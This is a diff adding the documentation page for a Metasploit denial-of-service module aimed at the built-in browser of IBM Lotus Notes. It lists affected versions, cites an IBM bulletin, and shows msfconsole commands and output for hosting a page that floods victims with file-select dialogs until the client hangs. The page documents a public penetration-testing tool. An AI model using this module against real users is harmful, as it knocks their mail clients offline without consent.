|
| 1 | +## Vulnerable Application |
| 2 | +This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application. |
| 3 | + |
| 4 | +If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, |
| 5 | +would cause the client hang and have to be restarted. |
| 6 | + |
| 7 | +Affected Products and Versions |
| 8 | + |
| 9 | +IBM Notes 9.0.1 to 9.0.1 FP8 IF1 |
| 10 | +IBM Notes 9.0 to 9.0 IF4. |
| 11 | +IBM Notes 8.5.3 to 8.5.3 FP6 IF13. |
| 12 | +IBM Notes 8.5.2 to 8.5.2 FP4 IF3. |
| 13 | +IBM Notes 8.5.1. to 8.5.1 FP5 IF5. |
| 14 | +IBM Notes 8.5 release |
| 15 | + |
| 16 | +Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 |
| 17 | + |
| 18 | +## Verification |
| 19 | + |
| 20 | +Start msfconsole |
| 21 | + |
| 22 | +`use auxiliary/dos/http/ibm_lotus_notes2.rb` |
| 23 | + |
| 24 | +Set `SRVHOST` |
| 25 | + |
| 26 | +Set `SRVPORT` |
| 27 | + |
| 28 | +run (Server started) |
| 29 | +Visit server URL in the built-in web-browser of IBM Notes client application |
| 30 | + |
| 31 | +## Scenarios |
| 32 | + |
| 33 | +``` |
| 34 | +msf > use auxiliary/dos/http/ibm_lotus_notes2 |
| 35 | +msf auxiliary(ibm_lotus_notes2) > show options |
| 36 | +
|
| 37 | +Module options (auxiliary/dos/http/ibm_lotus_notes2): |
| 38 | +
|
| 39 | + Name Current Setting Required Description |
| 40 | + ---- --------------- -------- ----------- |
| 41 | + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 |
| 42 | + SRVPORT 8080 yes The local port to listen on. |
| 43 | + SSL false no Negotiate SSL for incoming connections |
| 44 | + SSLCert no Path to a custom SSL certificate (default is randomly generated) |
| 45 | + URIPATH no The URI to use for this exploit (default is random) |
| 46 | +
|
| 47 | +
|
| 48 | +Auxiliary action: |
| 49 | +
|
| 50 | + Name Description |
| 51 | + ---- ----------- |
| 52 | + WebServer |
| 53 | +
|
| 54 | +
|
| 55 | +msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50 |
| 56 | +SRVHOST => 192.168.0.50 |
| 57 | +msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092 |
| 58 | +SRVPORT => 9092 |
| 59 | +msf auxiliary(ibm_lotus_notes2) > run |
| 60 | +[*] Auxiliary module execution completed |
| 61 | +msf auxiliary(ibm_lotus_notes2) > |
| 62 | +[*] Using URL: http://192.168.0.50:9092/mypath |
| 63 | +[*] Server started. |
| 64 | +msf auxiliary(ibm_lotus_notes2) > |
| 65 | +``` |
| 66 | + |
| 67 | +At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive. |
0 commit comments